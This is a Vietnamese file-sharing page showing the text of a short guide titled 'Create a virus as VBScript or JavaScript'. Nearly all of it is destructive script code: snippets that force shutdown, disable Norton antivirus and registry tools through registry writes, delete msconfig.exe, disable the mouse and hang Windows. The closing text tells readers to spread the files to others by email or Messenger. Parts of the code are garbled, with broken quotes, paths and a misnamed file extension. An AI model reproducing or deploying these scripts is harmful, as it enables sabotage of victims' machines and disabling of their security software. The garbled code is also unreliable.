intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Tạo Virus dưới dạng _VBSCRIPT hoặc _Javascript

Chia sẻ: EntrySKY ESIT's | Ngày: | Loại File: PDF | Số trang:3

172
lượt xem
82
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Bạn chỉ cần copy cái code này rồi save nó thành file, sau đó đem file này gửi đi các máy khác, gửi qua mail nè, qua Mesenger nè, hay là bạn copy cái này rồi đem ra dịch vụ thử nghiệm xem sao.Bạn copy xong rùi, thay vì save nó dưới dạng *.Txt (trong Wordpad hay Notepad dzì dzì đó) , bạn đổi thành *.VNSCRIPT hay *.JAVASCRIPT là xong liền hà. Chúc bạn thành công (đừng thử nghiệm mình nha !)Nếu làm không cẩn thận thì mình sẽ là nạn nhân đầu tiên đấy ....

Chủ đề:
Lưu

Nội dung Text: Tạo Virus dưới dạng _VBSCRIPT hoặc _Javascript

  1. Tạo Virus dưới dạng _VBSCRIPT hoặc _Javascript Chỉ với Notepad hay Wordpad bạnđã có thể tự tạo cho mình 1 “chú” Virus dưới dạng _VBSCRIPT hoặc _Javascript rồi: Dưới đây là code của một số con virus nhỏ dưới dạng VBS: 1.Không cho victim khởi động máy: Code: Dim wsh Set wsh = createobject(”wscript.shell”) wsh.run “RUNDLL32.EXE user.exe,exitwindows” 2. Disable NAV: Code: Dim wsh Set wsh= CreateObject( “WScript.Shell”) s1 = “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servi c es\Norton Program Scheduler\Start” wsh.RegWrite s1,3, “REG_DWORD” 3. Hiển thị một message mỗi khi reboot máy: Code: dim wsh Set wsh = CreateObject( “WScript.Shell” ) s1 = “HKLM\Software\Microsoft\Windows\CurrentVersion\Wi n Logon\”
  2. s2 = “LegalNoticeCaption” s3 = “LegalNoticeText” wsh.RegWrite s1+s2, “http://allformy.topcities.com” wsh.RegWrite s1+s3, “WHO_I_AM_?” 4. Hiển thị một dòng lệnh khi click vào file hay folder: Code: set reg=createobject(”WScript.shell”) reg.regwrite “HKEY_CLASSES_ROOT\*\Shell\\”,”Ban da bi toi khong che” reg.regwrite “HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che”,”I_LOVE_U” 5. Làm cho các trò trên hoạt động bình thường: Code: Dim objShell Set objShell = CreateObject( “WScript.Shell” ) s1 = “HKEY_USERS\.Default\Software\Microsoft\Windows\Cu r rentVersion\ “ s2 = “Policies\System\DisableRegistryTools” objShell.RegWrite s1+s2,1, “REG_DWORD” Dưới dạng Javascipt : Code: ar wsh; wsh=new ActiveXObject (”Wscript.shell”);// Winlogon when reboot var s1 = “HKLM\\Software\\Microsoft\\Windows\\CurrentVersio n \\WinLogon\\”; var s2 = “LegalNoticeCaption”; var s3 = “LegalNoticeText”;
  3. wsh.RegWrite (s1+ s2, “http://allformy.topcities.com”) ; wsh.RegWrite (s1+s3, “Ban da bi toi khong che”) ; //Disable Registry var s1 = “HKEY_USERS\\.Default\\Software\\Microsoft\\Window s \\CurrentVers ion\\”; var s2 = “Policies\\System\\DisableRegistryTools” ; wsh.RegWrite (s1+s2,0,”REG_DWORD”); //Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn var fso; fso=new ActiveXObject(”Scripting.FileSystemObject”); var fe=fso.getfile(”C:\\windows\\msconfig.exe); fe.delete true; //Shutdown windows //Disable Mouse wsh.run (”RUNDLL32.EXE mouse,disable”); //Hang up windows wsh.run (”rundll32 user,disableoemlayer”); Bạn chỉ cần copy cái code này rồi save nó thành file, sau đó đem file này gửi đi các máy khác, gửi qua mail nè, qua Mesenger nè, hay là bạn copy cái này rồi đem ra dịch vụ thử nghiệm xem sao.Bạn copy xong rùi, thay vì save nó dưới dạng *.Txt (trong Wordpad hay Notepad dzì dzì đó) , bạn đổi thành *.VNSCRIPT hay *.JAVASCRIPT là xong liền hà. Chúc bạn thành công (đừng thử nghiệm mình nha !)Nếu làm không cẩn thận thì mình sẽ là nạn nhân đầu tiên đấy .
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2